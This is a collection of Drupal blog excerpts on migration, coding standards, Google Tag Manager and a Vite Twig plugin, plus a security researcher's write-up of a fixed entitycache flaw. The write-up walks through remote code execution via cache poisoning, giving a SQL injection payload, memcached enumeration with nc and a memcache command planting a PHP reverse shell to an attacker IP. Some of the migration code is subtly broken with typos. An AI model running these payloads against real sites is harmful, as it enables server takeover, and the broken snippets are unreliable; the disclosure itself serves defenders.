Promet Source: How to Keep Data Secure During CMS Migration

Takeaway: Securing data is a continuous process, not just a one-time action. When we talk about CMS migration, especially for sites with sensitive information, the focus should be as much on keeping data safe during the move as on ensuring its ongoing security afterward. As someone deeply involved in CMS migrations, my experience has shown that the real challenge lies not just in moving data, but in maintaining its integrity every step of the way.

Salsa Digital: Salsa at DrupalCon Europe 2023

Image removed.Suchi’s Rules as Code presentation Suchi’s presentation provides information about two Rules as Code  implementations, both using OpenFisca and Drupal, including an OpenFisca Drupal module that integrates OpenFisca with a Drupal webform. Akhil’s CivicTheme presentation Akhil’s presentation looks at the benefits of a design system and takes the audience through a Figma to Drupal mapping process with CivicTheme .

Drupal Core News: Coding standards proposals for final discussion on 20 December

The Technical Working Group (TWG) is announcing two coding standards changes for final discussion. Feedback will be reviewed at the meeting scheduled for Wednesday 20 December 2200 UTC.

Issues for discussion

The Coding Standards project page outlines the process for changing Drupal coding standards.

Join the team working on Coding Standards

Join #coding-standards in Drupal Slack to meet and work with others on improving the Drupal coding standards. We work on improving our standards as well as implementing them in the core software.

LN Webworks: Google Tag Manager With Drupal : All You Need to Know

Image removed.

Maximizing website engagement and interactivity is a major goal of all marketers. However, the management of multitudinous third-party integrations and tracking tools is a laborious task. Gladly, Google created Google Tag Manager to simplify the complicated lives of marketing teams worldwide. It makes managing, upgradation, and tracking of tags, snippets, and third-party integrations a piece of cake for them.

The best part is that this platform is intuitive and user-friendly which contributes a fair share in its massive appeal. If you own a Drupal website and wonder how to use Google Tag Manager with Drupal like many others, this blog is all you need. It elucidates everything in a detailed yet simplified manner.

First, let’s delve into what Google Tag Manager is and what makes it special.

Specbee: Handling Custom Drupal Migrations Using SqlBase

There’s so much going on in the world of Drupal migrations. Drupal 9 reached its End Of Life (EOL) on November 1, 2023. Drupal 7 will reach EOL by January 2025 (final extension). Drupal 10 was released back in December 2022 and its current version, 10.1.6 was released on November 1, 2023. More than twelve thousand sites have already migrated to the current version of Drupal 10 (according to the Upgrade Status module download stats). In this article, we’ll take you through the different Drupal migration methods and especially focus on custom migrations using the SqlBase source plugin. Take a look! In Technical Terms, What is a Drupal Migration? Drupal migration is the process of moving content, data, and configuration from another CMS (or an older version of Drupal) to Drupal. A migration consists of several steps: Extract, Transform, and Load (ETL). In the Drupal world, we refer to these as source plugins, process plugins, and destination plugins. The Extract phase is known as the source, Transform is the process, and Load is the destination. Drupal Migration Methods When migrating your website from Drupal 7 to Drupal 9 or a later version, there are primarily two migration methods available. Migration UI  Drush (Custom migration) Migration UI  When you want to migrate your entire web application, including all configurations and content, to a later version, you can use Migration UI. It's a straightforward option that doesn't require in-depth knowledge of Drupal APIs. This approach can be used where your site is not too complex in terms of site architecture and considering all the modules used in Drupal 7 are also available in the target version (Drupal 9 or Drupal 10). Custom Migration When you are rewriting your website with a more modern and performance-centric approach which leads to significant changes in the architecture of your new website from Drupal 9, Migration UI literally won’t work. In such cases, you’ll need to roll up your sleeves and build custom migration scripts. Migration Process Let’s dig deeper into the migration process. It comprises of 3 major processes. Source plugin (Extract) Process plugin (Transform) Destination plugin (Load) Source Plugin Source plugins handle the extraction of data from various sources, which can be in different formats, including raw data, databases, and CSV/XML/JSON files. They extract data from these sources and pass it on to the next phase in the migration process. Process Plugin The process plugin works on the source data, restructuring it to match the destination process. It transforms the data into an array, where each key corresponds to a destination property. The values assigned to each key determine how the destination values for your new website are generated. More details can be found here. Destination plugin The destination plugin processes the structured data and saves it on your website. The most common destination plugins are node, term, user, and media. You likely have a grasp of the migration process. Now, let's delve deeper into source plugins, with a specific focus on the SqlBase source plugin. Thinking of migrating your Drupal 7 website to Drupal 10? Get your Drupal 7 Site Audit report for Free! Using SqlBase for the Drupal Migration What is SqlBase migration? SqlBase migration is straightforward—it allows you the flexibility to create your custom SQL queries to obtain the desired output. Other than that, it follows the same principles as other Drupal migration methods. Why should you use SqlBase Migration? When your site has a straightforward field structure, content types, etc., Drupal core migration can handle it. However, challenges arise with obsolete field types in Drupal 9 or when restructuring an old website with various content types. If you aim for an editor-friendly and performance-oriented site, a simple migration won't suffice. You'll need to prepare your source data and take the SqlBase migration route. In another scenario, if your current site, built on a platform other than Drupal, provides data in the form of a database, SqlBase migration is also the way to go. Benefits of leveraging SqlBase Migration Since this is SqlBase, the speed of your migration relies entirely on how well you craft your database queries. The better your query preparation, the faster the migration will run. It doesn't rely on many core migration processes; you have the flexibility to shape and process your data as you see fit. The SqlBase Source Plugin must implement these three methods: query(): Returns the SQL query that selects the data from the source database. fields(): Returns available fields on the source. getIds(): Defines the source fields uniquely identifying a source row Let’s get into the details of what these functions should contain: query() function /** * {@inheritdoc} */ public function query() { $query = $this->select('job_details', 'c') ->fields('c', array( 'id', 'title', 'description',o 'position', 'company', 'criteria', )); return $query; }fields() function /** * {@inheritdoc} */ public function fields() { $fields = array( 'id'= $this->t('Autoincrement ID'), 'title' = $this->t('Job Title'), 'description' = $this->t('Job Description'), 'position' = $this->t('Job Position'), 'company'.= $this->t('Company'), 'criteria' = $this-»t('Job Criteria'), ); return $fields; }getIds() function /** * {@inheritdoc} */ public function getIds() { return [ 'id' => [ 'type' => 'integer', 'alias'=>'j' ]; }Additionally, you can tweak your SQL result by using the prepareRow() function and even add new source properties to your migration. /** * {@inheritdoc} */ public function prepareRow(Row $row) { $company = $row->getSourceProperty('company'); $row->setSourceProperty('job_type', 'on-site'); if ($company == 'specbee') { $row->setSourceProperty('job_type', 'remote'); } return parent::prepareRow($row); }These source properties will be sent to your migration yml files and you can also use your own processor if you want any additional processing on your source data. Referenceshttps://www.drupal.org/project/usage/3398311 Final Thoughts With Drupal 9's EOL, the impending farewell to Drupal 7, and the rise of Drupal 10, the need for seamless transitions has never been more pressing. As Drupal evolves, our Drupal Development Company recognizes SqlBase as an essential tool for a seamless and efficient migration process. Offering the flexibility to shape personalized SQL queries, it plays a vital role in crafting tailored data transitions. If you’re looking for a reliable Drupal migration partner, we’re just a form away! 

mcdruid.co.uk: Remote Code Execution in Drupal via cache injection, drush, entitycache, and create_function

PHP's create_function() was:

DEPRECATED as of PHP 7.2.0, and REMOVED as of PHP 8.0.0

As the docs say, its use is highly discouraged.

PHP 7 is no longer supported by the upstream developers, but it'll still be around for a while longer (because, for example, popular linux distributions provide support for years beyond the upstream End of Life).

Several years ago I stumbled across a usage of create_function in the entitycache module which was open to abuse in quite an interesting way.

The route to exploitation requires there to be a security problem already, so the Drupal Security Team agreed there was no need to issue a Security Advisory.

The module has removed the problematic code so this should not be a problem any more for sites that are staying up-to-date.

This is quite a fun vulnerability though, so let's look at how it might be exploited given the right (or should that be "wrong"?) conditions.

To be clear, we're talking about Drupal 7 and (probably) drush 8. The latest releases of both are now into double digits.

Is it unsafe input?

Interestingly, the issue is in a drush specific inc file:

/** * Implements hook_drush_cache_clear(). */ function entitycache_drush_cache_clear(&$types) { $entities = entity_get_info(); foreach ($entities as $type => $info) { if (isset($info['entity cache']) && $info['entity cache']) { // You can't pass paramters to the callbacks in $types, so create an // anonymous function for each specific bin. $lamdba = create_function('', "return cache_clear_all('*', 'cache_entity_" . $type . "', TRUE);"); $types['entitycache-' . str_replace('_', '-', $type)] = $lamdba; } } }

https://git.drupalcode.org/project/entitycache/-/blob/7.x-1.5/entitycach...

Let's remind ourselves of the problem with create_function(); essentially it works in a very similar way to calling eval() on the second $code parameter.

So - as is often the case - it's very risky to pass unsafe user input to it.

In this case, we might not even consider the $type variable to be user input; it comes from the array keys returned by entity_get_info().

Is there really a problem here? Well only if an attacker were able to inject something into those array keys. How might that happen?

entity_cache_info() uses a cache to minimise calls to implementations of hook_entity_info.

If an attacker is able to inject something malicious into that cache, there could be a path to Remote Code Execution here.

Let's just reiterate that this is a big "IF"; an attacker having the ability to inject things into cache is obviously already a pretty significant problem in the first place.

How might that come about? Perhaps the most obvious case would be a SQL Injection (SQLi) vulnerability. Assuming a site keeps its default cache bin in the database, a SQLi vulnerability might allow an attacker to inject their payload. We can look more closely at how that might work, but note that the entitycache project page says:

Don't bother using this module if you're not also going to use http://drupal.org/project/memcache or http://drupal.org/project/redis - the purpose of entitycache is to allow queries to be offloaded from the database onto alternative storage. There are minimal, if any, gains from using it with the default database cache.

So perhaps it's not that likely that a site using entitycache would have its cache bins in the database.

We'll also look at how an attacker might use memcache as an attack vector.

Proof of Concept

To keep things simple initially, we'll look at conducting the attack via SQL.

Regardless of what technology the victim site is using for caching, the attack needs to achieve a few objectives.

As we consider those, keep in mind that the vulnerable code is within an implementation of hook_drush_cache_clear, so it will only run if and when caches are cleared via drush.

Objectives

  • The malicious payload has to be injected into the array keys of the cached data returned by entity_cache_info().
  • The injection cannot break Drupal so badly that drush cannot run a cache clear.
  • However, the attacker may wish to deliberately break the site sufficiently that somebody will attempt to remedy the problem by clearing caches (insert "keep calm and clear cache" meme here!).

We can see that relevant cache item here is:

$cache = cache_get("entity_info:$langcode")

The simplest possible form of attack might be to try to inject a very simple array into that cache item, with the payload in an array key. For example:

array('malicious payload' => 'foo');

Let's look at what we'd need to do to inject this array into the site's cache so that this is what entity_cache_info() will return.

The simplest way to do this is to use a test Drupal 7 site and the cache API. Note that we're highly likely to break the D7 site along the way.

We can use drush to run some simple code that stores our array into the cache:

$ drush php   >>> $entity_info = array('malicious payload' => 'foo'); => [ "malicious payload" => "foo", ]   >>> cache_set('entity_info:en', $entity_info);

Now let's look at the cache item in the db:

$ drush sqlc   > SELECT * FROM cache WHERE cid = 'entity_info:en'; +----------------+-------------------------------------------+--------+------------+------------+ | cid | data | expire | created | serialized | +----------------+-------------------------------------------+--------+------------+------------+ | entity_info:en | a:1:{s:17:"malicious payload";s:3:"foo";} | 0 | 1696593295 | 1 | +----------------+-------------------------------------------+--------+------------+------------+

Okay, that's pretty simple; we can see that the array was serialized. (Of course the fact that the cache API will unserialize this data may lead to other attack vectors if there's a suitable gadget chain available, but we'll ignore that for now.)

How is the site doing now? Let's try a drush status:

$ drush st   Error: Class name must be a valid object or a string in entity_get_controller() (line 8216 of /var/www/html/includes/common.inc).   Drush was not able to start (bootstrap) Drupal. Hint: This error can only occur once the database connection has already been successfully initiated, therefore this error generally points to a site configuration issue, and not a problem connecting to the database.

That's not so great, and importantly we get the same error when try to clear caches by running drush cc all.

We've broken the site so badly that drush cannot bootstrap Drupal sufficiently to run a cache clear, so we've failed to meet the objectives.

The site can be restored by manually removing the injected cache item, but this means the attack was unsuccessful.

It seems we need to be a bit more surgical when injecting the payload into this cache item, as Drupal's bootstrap relies on being able to load some valid information from it.

We could just take the valid default value for this cache item and inject the malicious payload on top of that, but it's quite a lot of serialized data (over 13kb) and is therefore quite cumbersome to manipulate.

Through a process of trial and error, using Xdebug to step through the code, we can derive some minimal valid data that needs to be present in the cache item for drush to be able to bootstrap Drupal far enough to run a cache clear.

It's mostly the user entity that needs to be somewhat intact, but there's also a dependency on the file entity that requires a vaguely valid array structure to be in place.

Here's an example of a minimal array that we can use for the injection that allows a sufficiently full bootstrap:

$entity_info['user'] = [ 'controller class' => 'EntityCacheUserController', 'base table' => 'users', 'entity keys' => ['id' => 'uid'], 'schema_fields_sql' => ['base table' => ['uid']], 'entity cache' => TRUE, ];   $entity_info = [ 'user' => $entity_info['user'], 'file' => $entity_info['user'], 'malicious payload' => $entity_info['user'] ];

Note that it seems only the user entity really needs the correct entity controller and db information, so we can reuse some of the skeleton data. It may be possible to trim this back further.

Let's try injecting that into the cache via drush php and then checking whether drush is still functional.

It's convenient to put the injection code into a script so we can iterate on it easily - the $entity_info array is the same as the code snippet above.

$ cat cache_injection.php <?php   $entity_info['user'] = [ 'controller class' => 'EntityCacheUserController', 'base table' => 'users', 'entity keys' => ['id' => 'uid'], 'schema_fields_sql' => ['base table' => ['uid']], 'entity cache' => TRUE, ];   $entity_info = [ 'user' => $entity_info['user'], 'file' => $entity_info['user'], 'malicious payload' => $entity_info['user'] ];   cache_set('entity_info:en', $entity_info);   $ drush scr cache_injection.php   $ drush st Drupal version : 7.99-dev   ...snip - no errors...   $ drush ev 'print_r(array_keys(entity_get_info()));' Array ( [0] => user [1] => file [2] => malicious payload )

We can successfully run drush cc all with this in place, but all that this achieves is blowing away our injected payload and replacing it with clean values generated by hook_entity_info.

$ drush cc all 'all' cache was cleared.   $ drush ev 'print_r(array_keys(entity_get_info()));' Array ( [0] => comment [1] => node [2] => file [3] => taxonomy_term [4] => taxonomy_vocabulary [5] => user )

We're making progress though.

Let's try putting an actual payload into the array key in our script:

$ tail -n7 cache_injection.php   $entity_info = [ 'user' => $entity_info['user'], 'file' => $entity_info['user'], 'foo\', TRUE);} echo "code execution successful"; //' => $entity_info['user'] ];   cache_set('entity_info:en', $entity_info);   $ drush scr cache_injection.php   $ drush ev 'print_r(array_keys(entity_get_info()));' Array ( [0] => user [1] => file [2] => foo', TRUE);} echo "code execution successful"; // )   $ drush cc all code execution successfulcode execution successful'all' cache was cleared.

Great, so it's not very pretty but we've achieved code execution when the cache was cleared via drush.

A real attacker would no doubt want to do a bit more than just printing messages. As is often the case, escaping certain characters can be a bit tricky but you can squeeze quite a useful payload into the array key.

Having said we've achieved code execution, so far we got there by running PHP code through drush. If an attacker could do this, they don't really need to mess around with injecting payloads into the caches.

Let's work backwards now and see how this attack might work with more limited access whereby injecting data into the cache is all we can do.

Attack via SQLi

If we re-run the injection script but don't clear caches, we can look in the db to see what ended up in cache.

$ drush sqlq 'SELECT data FROM cache WHERE cid = "entity_info:en";'   a:3:{s:4:"user";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}s:4:"file";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}s:50:"foo', TRUE);} echo "code execution successful"; //";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}}

This is not very pretty to look at, but we can see our array has been serialized.

If we have a SQLi vulnerability to play with, it's not hard to inject this payload straight into the db.

To simulate using a payload in a SQLi attack we could store the data in a file then send it to the db in a query. We'll empty out the cache table first to prove that it's our injected payload achieving execution.

After wiping the cache manually like this, we'll call drush status to repopulate the cache with valid entries. This means we can use an UPDATE statement (as opposed to doing an INSERT if the caches are initially empty), which is a more realistic simulation of attacking a production site.

Note also that we have to ensure that any quotes in our payload are escaped appropriately, and that we don't have any newlines in the middle of our SQL statement.

I often think fiddly things like this are the hardest part of developing these PoC exploits!

# inject the payload using a drush script $ drush scr cache_injection.php   # extract the payload into a SQL statement stored in a file $ echo -n "UPDATE cache SET data = '" > sqli.txt $ drush sqlq 'SELECT data FROM cache WHERE cid = "entity_info:en";' | sed "s#'#\\\\'#g" | tr -d "\n" >> sqli.txt $ echo "' WHERE cid = 'entity_info:en';" >> sqli.txt   # empty the cache table, and repopulate it with valid entries $ drush sqlq 'DELETE FROM cache;' $ drush st   # inject the payload, simulating SQLi $ cat sqli.txt | drush sqlc   # execute the attack $ drush cc all code execution successful ...

So we've now developed a single SQL statement that could be run via SQLi which will result in RCE when drush cc all is run on the victim site.

In an actual attack, the payload would be prepared on a separate test site and the injection would only happen via SQLi on the victim site.

However, as mentioned previously it's perhaps unlikely that a site using the entitycache module would be keeping its caches in the database.

Attack via memcache

How about if the caches are in memcache; what might an attack look like then?

First we're going to assume that the attacker has network access to the memcached daemon. Hopefully this is quite unlikely in real life, but it's not impossible.

The objective of the attack will be exactly the same in that we want to inject a malicious payload into the array keys of the data cached for entity info.

The mechanics of how we might do so are a little different with a "memcache injection" though.

The Drupal memcache module (optionally) uses a key prefix to "namespace" cache items for a given site, which allows multiple applications to share the same memcached instance (and such a shared instance is one scenario in which this attack might take place).

In order to be able to inject a payload into a specific cache item, the attacker would need to find out what prefix is in use for the target site.

Here's an example of issuing a couple of commands over the network to a memcached instance in order to find out what the cache keys look like:

$ echo "stats slabs" | nc memcached 11211 | head -n2 STAT 2:chunk_size 120 STAT 2:chunks_per_page 8738   $ echo "stats cachedump 2 2" | nc memcached 11211 | head -n2 ITEM dd_d7-cache-.wildcard-node_types%3A [1 b; 0 s] ITEM dd_d7-cache-.wildcard-entity_info%3A [1 b; 0 s]

This shows us that there's a Drupal site using a key prefix of dd_d7. A large site may be using multiple memcached slabs and this enumeration step may be a bit more complex.

So in this case the cache item we're looking to attack will have the key dd_d7-cache-entity_info%3Aen.

We can go through a very similar exercise to what we did with the SQL caches; using a test site to inject the minimal data structure we want into the cache, then extracting it to see exactly what it looks like when stored in a memcache key/value pair.

There are a couple of small complications we're likely to encounter with this workflow.

One of those is that Drupal typically uses compression by default in memcache. This is generally a good thing, but makes it harder to extract the payload we want to inject in plain text that's easy to manipulate.

If you've ever output a zip file or compressed web page in your terminal and ended up with a screen full of gobbledygook, that's the sort of thing that'll happen if you try to retrieve a compressed item directly from memcached.

We can get around this by disabling compression on our test site.

Another potential problem is that the memcache integration works a bit differently to database cache when it comes to expiry of items. By default, memcache won't return items once their expiry timestamp has passed, whereas the database cache will return stale items (for a while at least).

This means that if an attacker prepares a payload for memcache but leaves the expiry timestamp in tact, it's possible that the item will already be expired by the time the payload is injected into the target site, and the attack will not work.

It's not too hard to get around this by setting a fake timestamp that should avoid expiry. Note that there are at least two different types of expiry at play here; memcache itself has an expiry time, and Drupal's cache API has its own on top of this.

There's also the concept of cache flushes in Drupal memcache. It's out of scope to go into too much detail about that here, but the tl;dr is that the memcache module keeps track of when caches are flushed and tries not to return items that were stored before any such flush. An attack has more chance of succeeding if it also tries to ensure that the injected cache item doesn't fall foul of this as it'd then be treated as outdated and not returned.

Injecting an item into memcache will typically mean using the SET command.

The syntax for this command includes a flags parameter which is "opaque to the server" but is used by the PHP memcached extension to determine whether a cache item is compressed. This means that even if a site is using compression by default, an attacker can inject an uncompressed item and the application will not know the difference; the PHP integration handles the compression (or lack thereof).

Part of the syntax also tells the server how many bytes of data are about to be transmitted following the initial SET instruction. This means that if we manipulate the data we want to store in memcache, we have to ensure that the byte count remains correct.

We also need to ensure that the PHP serialized data remains consistent; for example if we change an IP address we need to ensure that the string its within still has the correct length e.g. s:80:\"foo' ...

Putting all of that together, and jumping through some more hoops to ensure that quotes are appropriately escaped, we might end up with something like the below:

$ echo -e -n "set dd_d7-cache-entity_info%3Aen 4 0 978\r\nO:8:\"stdClass\":6:{s:3:\"cid\";s:14:\"entity_info:en\";s:4:\"data\";a:3:{s:4:\"user\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}s:4:\"file\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}s:80:\"foo', TRUE);}\$s=fsockopen(\"172.19.0.1\",1337);\$p=proc_open(\"sh\",[\$s,\$s,\$s],\$i);//\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}}s:7:\"created\";i:TIMESTAMP;s:17:\"created_microtime\";d:TIMESTAMP.2850001;s:6:\"expire\";i:0;s:7:\"flushes\";i:999;}\r\n" | sed "s/TIMESTAMP/9999999999/g" | nc memcached 11211

This should successfully inject a PHP reverse shell into the array keys, which gets executed when drush cc all is run and the vulnerable code passes each array key to create_function().

$ ./poison_entity_info.sh # this script contains the memcache set command above STORED   $ drush ev 'print_r(array_keys(entity_get_info()));' Array ( [0] => user [1] => file [2] => foo', TRUE);}$s=fsockopen("172.19.0.1",1337);$p=proc_open("sh",[$s,$s,$s],$i);// )   $ drush cc all 'all' cache was cleared.

Meanwhile in the attacker's terminal...

$ nc -nvlp 1337 Listening on 0.0.0.0 1337   Connection received on 172.19.0.3 58220   python -c 'import pty; pty.spawn("/bin/bash")'   mcdruid @ drupal-7:/var/www/html$ head -n2 CHANGELOG.txt Drupal 7.xx, xxxx-xx-xx (development version) -----------------------

We successfully popped an interactive reverse shell from the victim system when the drush cache clear command was run.

One final step in this attack might be to deliberately break the site just enough that the administrator will manually clear the caches to try to rectify the problem, but not so badly that clearing the caches with drush will not work.

Perhaps the injection into the entity_info cache item already achieves that goal?

Could this attack also be carried out via Redis? Probably.

I'm sharing the details of this attack scenario because I think it's an interesting one, and because well maintained sites should not be affected. In order to be exploitable the victim site has to be running an outdated version of the entitycache module, on PHP<8, and most importantly has to be vulnerable (or at least exposed) in quite a serious way; if an attacker can inject arbitrary data into a site's caches, they can do all sorts of bad things.

As always, the best advice for anyone concerned about their site(s) being vulnerable is to keep everything up-to-date; the latest releases of the entitycache module no longer call create_function().

Thanks to Greg Knaddison (greggles) for reviewing this post.

Tags: drupal-planetsecurityrcephpdrush

PreviousNext: Drupal front-end nirvana with Vite, Twig and Storybook

We're proud to announce the release of vite-plugin-twig-drupal, a plugin for Vite that we hope will improve your workflow for front-end development with Drupal.

by lee.rowlands / 28 November 2023

The problem space

You're working with Twig in a styleguide-driven-development process. You're writing isolated components that consist of CSS, Twig and JavaScript. You want to be able to use Twig to render your components for Storybook. You want fast refresh with Vite. You want Twig embeds, includes and extends to work. You want to use Drupal-specific twig features like create_attributes etc. You want compilation of PostCSS and SASS to CSS. You want Hot Module Reloading (HMR) so that you can see how your components look without needing to endlessly refresh.

Enter vite-plugin-twig-drupal

The Vite plugin Twig Drupal is a Vite plugin based on Twig JS for compiling Twig-based components into a JavaScript function so that they can be used as components with Storybook. It allows you to import Twig files into your story as though they are JavaScript files.

Comparison to other solutions

  • Vite plugin twig loader doesn't handle nested includes/embeds/extends. These are a fairly crucial feature of Twig when building a component library as they allow re-use and DRY principles
  • Components library server requires you to have a running Drupal site. Whilst this ensures your Twig output is identical to that of Drupal (because Drupal is doing the rendering), it is a bit more involved to setup. If you're going to use single directory components or a similar Drupal module like UI patterns then this may be a better option for you.

Installation

This module is distributed via npm, which is bundled with node and should be installed as one of your project's devDependencies:

npm install --save-dev vite-plugin-twig-drupal

You then need to configure your vite.config.js.

import { defineConfig } from "vite" import twig from 'vite-plugin-twig-drupal'; import { join } from "node:path" export default defineConfig({ plugins: [ // Other vite plugins. twig({ namespaces: { components: join(__dirname, "/path/to/your/components"), // Other namespaces as required. }, // Optional if you are using React storybook renderer. The default is 'html' and works with storybook's html // renderer. // framework: 'react' }), // Other vite plugins. ], })

With this config in place, you should be able to import Twig files into your story files.

Examples

To make use of a Twig file as a Storybook component, just import it. The result is a component you can pass to Storybook or use as a function for more complex stories.

// stories/Button.stories.js // Button will be a Javascript function that accepts variables for the twig template. import Button from './button.twig'; // Import stylesheets, this could be a sass or postcss file too. import './path/to/button.css'; // You may also have JavaScript for the component. import './path/to/some/javascript/button.js'; export default { title: 'Components/Button', tags: ['autodocs'], argTypes: { title: { control: { type: 'text' }, }, modifier: { control: { type: 'select' }, options: ['primary', 'secondary', 'tertiary'], }, }, // Just pass along the imported variable. component: Button, }; // Set default variables in the story. export const Default = { args: { title: 'Click me' }, }; export const Primary = { args: { title: 'Click me', modifier: 'primary' }, }; // Advanced example. export const ButtonStrip = { name: 'Button group', render: () => ` ${Button({title: 'Button 1', modifier: 'primary'})} ${Button({title: 'Button 2', modifier: 'secondary'})} ` }

Here's how that might look in Storybook (example from the Admin UI Initiative storybook)

Image removed.

Dealing with Drupal.behaviors

In cases where the JavaScript you import into your story file uses a Drupal behavior, you'll likely need some additional code in your Storybook configuration to handle firing the behaviors. Here at PreviousNext, we prefer to use a loadOnReady wrapper, which works with and without Drupal. However, if you're just using Drupal.behaviors something like this in your Storybook config in main.js (or main.ts) will handle firing the behaviors.

const config = { // ... existing config previewBody: (body) => ` window.Drupal = window.Drupal || {behaviors: {}}; window.drupalSettings = Object.assign(window.drupalSettings || {}, { // Mock any drupalSettings your behaviors need here. }); // Mock Drupal's once library too. window.once = (_, selector) => document.querySelectorAll(selector); document.addEventListener('DOMContentLoaded', () => { Object.entries(window.Drupal.behaviors).forEach(([key, object]) => object.attach(document)); }) ${body} ` // ... more config }

Give it a try

We're looking forward to using this plugin in client projects and are excited about the other possibilities Storybook provides us with, such as interaction and accessibility testing.

Thanks to early testers in the community, such as Ivan Berdinsky and Sean Blommaert, who've already submitted some issues to the github queue. We're really happy to see it in use in the Admin Initiative's work on a new toolbar.

Give it a try, and let us know what you think.

Tagged

Storybook, Front End Development